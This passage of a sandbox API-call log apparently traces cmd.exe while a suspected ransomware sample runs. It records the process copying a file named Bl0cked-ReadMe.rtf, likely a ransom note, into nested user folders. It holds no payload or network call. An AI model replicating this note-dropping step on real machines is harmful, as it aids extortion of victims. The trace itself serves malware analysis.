VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, 
Protect=0x104, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.921] GetConsoleOutputCP () returned 0x1b5 [0231.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.924] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.924] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.947] GetEnvironmentStringsW () returned 0x2e0208* [0231.947] FreeEnvironmentStringsW (penv=0x2e0208) returned 1 [0231.947] GetEnvironmentStringsW () returned 0x2e0208* [0231.948] FreeEnvironmentStringsW (penv=0x2e0208) returned 1 [0231.948] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e934 | out: phkResult=0x16e934*=0x40) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", 
lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x98, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x0, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegCloseKey (hKey=0x40) returned 0x0 [0231.948] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e934 | out: phkResult=0x16e934*=0x40) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, 
lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x0, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegCloseKey (hKey=0x40) returned 0x0 [0231.948] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.949] srand (_Seed=0x5b8863bf) [0231.949] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf\"" [0231.949] GetCommandLineW () 
returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf\"" [0231.949] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.949] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1968, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.950] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.950] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.950] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.950] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.950] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.950] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.950] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.950] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.950] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.950] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.950] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.950] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.950] GetEnvironmentStringsW () returned 0x2e2358* [0231.950] FreeEnvironmentStringsW (penv=0x2e2358) returned 1 [0231.950] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.950] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.950] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.950] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.951] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.951] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.951] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.951] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.951] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.951] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.951] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f700 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.951] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f700, lpFilePart=0x16f6fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f6fc*="Desktop") returned 0x18 [0231.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.951] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2e09e8 [0231.951] FindClose (in: hFindFile=0x2e09e8 | out: hFindFile=0x2e09e8) returned 1 [0231.951] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2e09e8 [0231.951] FindClose (in: hFindFile=0x2e09e8 | out: hFindFile=0x2e09e8) returned 1 [0231.952] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2e09e8 [0231.952] FindClose (in: hFindFile=0x2e09e8 | out: hFindFile=0x2e09e8) returned 1 [0231.952] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.952] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.952] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.952] GetEnvironmentStringsW () returned 0x2e0208* [0231.952] FreeEnvironmentStringsW (penv=0x2e0208) returned 1 [0231.952] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.953] GetConsoleOutputCP () returned 0x1b5 [0231.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.978] GetUserDefaultLCID () returned 0x409 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f840, cchData=128 | out: lpLCData="0") returned 2 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f840, cchData=128 | out: lpLCData="0") returned 2 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f840, cchData=128 | out: lpLCData="1") returned 2 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.988] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.989] GetConsoleTitleW (in: lpConsoleTitle=0x2d0928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.016] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.016] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.016] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.017] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.017] _wcsicmp (_String1="type", _String2=")") returned 75 [0232.018] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0232.018] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0232.018] _wcsicmp (_String1="IF", _String2="type") returned -11 [0232.018] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0232.018] _wcsicmp (_String1="REM", _String2="type") returned -2 [0232.018] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0232.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.024] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f738 | out: lpMode=0x16f738) returned 1 [0232.145] _dup (_FileHandle=1) returned 3 [0232.146] _close (_FileHandle=1) returned 0 [0232.149] _wcsicmp 
(_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0232.149] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16f708, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0232.150] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0232.150] GetConsoleTitleW (in: lpConsoleTitle=0x16f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.151] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0232.151] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0232.151] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0232.151] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0232.152] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.152] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x16f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f09c) returned 0x2d0f00 [0232.152] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0232.152] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0232.152] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0232.153] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16dfa8, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0232.153] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0232.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.153] GetFileType (hFile=0x54) returned 0x1 [0232.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.153] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e000 | out: lpFileSizeHigh=0x16e000*=0x0) returned 0x1632 [0232.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.153] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.153] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.154] GetFileType (hFile=0x4c) returned 0x1 [0232.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.154] GetFileType (hFile=0x4c) returned 0x1 [0232.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.154] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] GetFileType (hFile=0x4c) returned 0x1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] GetFileType (hFile=0x4c) returned 0x1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] WriteFile (in: 
hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] GetFileType (hFile=0x4c) returned 0x1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] GetFileType (hFile=0x4c) returned 0x1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] GetFileType (hFile=0x4c) returned 0x1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] GetFileType (hFile=0x4c) returned 0x1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.157] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0232.157] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] GetFileType (hFile=0x4c) returned 0x1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] GetFileType (hFile=0x4c) returned 0x1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] GetFileType (hFile=0x4c) returned 0x1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] GetFileType (hFile=0x4c) returned 0x1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.158] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, 
lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: 